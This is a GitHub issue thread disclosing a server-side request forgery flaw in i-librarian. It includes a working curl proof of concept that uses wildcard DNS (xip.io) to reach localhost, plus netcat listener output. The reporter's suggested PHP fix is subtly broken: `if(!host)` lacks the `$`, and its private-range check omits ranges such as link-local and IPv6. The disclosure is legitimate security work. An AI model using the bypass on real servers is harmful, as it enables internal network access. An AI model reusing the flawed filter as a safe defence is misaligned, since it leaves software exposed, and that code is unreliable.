### ISSUE TITLE
SSRF vulnerability

### ISSUE THREAD

**Issue by sn00pyd0g3** [mkucej/i-librarian#120]
https://github.com/mkucej/i-librarian/blob/9535753a84bc615b210802d4c9542db73368d984/functions.php#L811

The filter can be bypassed by wildcard DNS.
e.g. xip.io

POC:
```
[sn00py.B0x] ➤ curl --request POST 'http://127.0.0.1/librarian/ajaxsupplement.php' --cookie 'PHPSESSID=khjhfcm85jtsfmk54vqij2dd30' --data 'form_new_file_link=http://127.0.0.1.xip.io:1337/ssrf&filename=shell.pdf'
```
```
[sn00py.B0x] ➤ nc -l 1337
GET /ssrf HTTP/1.1
Host: 127.0.0.1.xip.io:1337
User-Agent: curl/7.50.3
Accept: */*
```

**Comment by mkucej** [comment]
Thanks. Unfortunately, PHP filter does not seem to be very useful for this purpose. Any idea how to fix this?

**Comment by sn00pyd0g3** [comment]
That's my personal advice.
```php
<?php
function is_safe_url($url) {
	// Allow only http(s)
    if(!preg_match('/^https?:\/\/.*$/', $url)){
        return false;
    }

    $host = parse_url($url, PHP_URL_HOST);
    if(!host) {
    	return false;
    }

    $ip = gethostbyname($host);
    $ip = ip2long($ip);
    if($ip === false){
        return false;
    }
    
    $is_inner_ipaddress = ip2long('127.0.0.0') >> 24 == $ip >> 24 or 
        ip2long('10.0.0.0') >> 24 == $ip >> 24 or 
        ip2long('172.16.0.0') >> 20 == $ip >> 20 or 
        ip2long('192.168.0.0') >> 16 == $ip >> 16 ;
    if($is_inner_ipaddress){
        return false;
    }
    return true;
}
```

**Comment by mkucej** [comment]
Thank you.

**Comment by mkucej** [comment]
fixed in 4.9
